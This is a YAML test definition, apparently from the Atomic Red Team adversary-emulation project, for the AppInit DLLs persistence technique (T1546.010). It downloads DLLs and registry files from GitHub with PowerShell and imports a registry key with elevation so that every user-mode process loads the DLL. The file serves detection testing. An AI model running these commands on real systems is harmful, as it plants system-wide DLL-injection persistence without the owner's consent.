Carrie Roberts
d4709021fb
* updating atomics count in README.md [ci skip] * wip * handle spaces in path * update readme * fix typo --------- Co-authored-by: publish bot <opensource@redcanary.com>
50 lines
3.0 KiB
YAML
50 lines
3.0 KiB
YAML
attack_technique: T1546.010
|
|
display_name: 'Event Triggered Execution: AppInit DLLs'
|
|
atomic_tests:
|
|
- name: Install AppInit Shim
|
|
auto_generated_guid: a58d9386-3080-4242-ab5f-454c16503d18
|
|
description: |
|
|
AppInit_DLLs is a mechanism that allows an arbitrary list of DLLs to be loaded into each user mode process on the system. Upon succesfully execution,
|
|
you will see the message "The operation completed successfully." Each time the DLL is loaded, you will see a message box with a message of "Install AppInit Shim DLL was called!" appear.
|
|
This will happen regularly as your computer starts up various applications and may in fact drive you crazy. A reliable way to make the message box appear and verify the
|
|
AppInit Dlls are loading is to start the notepad application. Be sure to run the cleanup commands afterwards so you don't keep getting message boxes showing up.
|
|
|
|
Note: If secure boot is enabled, this technique will not work. https://docs.microsoft.com/en-us/windows/win32/dlls/secure-boot-and-appinit-dlls
|
|
supported_platforms:
|
|
- windows
|
|
input_arguments:
|
|
registry_file:
|
|
description: Windows Registry File
|
|
type: path
|
|
default: PathToAtomicsFolder\T1546.010\src\T1546.010.reg
|
|
registry_cleanup_file:
|
|
description: Windows Registry File
|
|
type: path
|
|
default: PathToAtomicsFolder\T1546.010\src\T1546.010-cleanup.reg
|
|
dependency_executor_name: powershell
|
|
dependencies:
|
|
- description: |
|
|
Reg files must exist on disk at specified locations (#{registry_file} and #{registry_cleanup_file})
|
|
prereq_command: |
|
|
if ((Test-Path "#{registry_file}") -and (Test-Path "#{registry_cleanup_file}")) {exit 0} else {exit 1}
|
|
get_prereq_command: |
|
|
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
|
|
New-Item -Type Directory (split-path "#{registry_file}") -ErrorAction ignore | Out-Null
|
|
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.010/src/T1546.010.reg" -OutFile "#{registry_file}"
|
|
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.010/src/T1546.010-cleanup.reg" -OutFile "#{registry_cleanup_file}"
|
|
- description: |
|
|
DLL's must exist in the C:\Tools directory (T1546.010.dll and T1546.010x86.dll)
|
|
prereq_command: |
|
|
if ((Test-Path c:\Tools\T1546.010.dll) -and (Test-Path c:\Tools\T1546.010x86.dll)) {exit 0} else {exit 1}
|
|
get_prereq_command: |
|
|
New-Item -Type Directory C:\Tools -ErrorAction ignore | Out-Null
|
|
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.010/bin/T1546.010.dll" -OutFile C:\Tools\T1546.010.dll
|
|
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.010/bin/T1546.010x86.dll" -OutFile C:\Tools\T1546.010x86.dll
|
|
executor:
|
|
command: |
|
|
reg.exe import "#{registry_file}"
|
|
cleanup_command: |
|
|
reg.exe import "#{registry_cleanup_file}" >nul 2>&1
|
|
name: command_prompt
|
|
elevation_required: true
|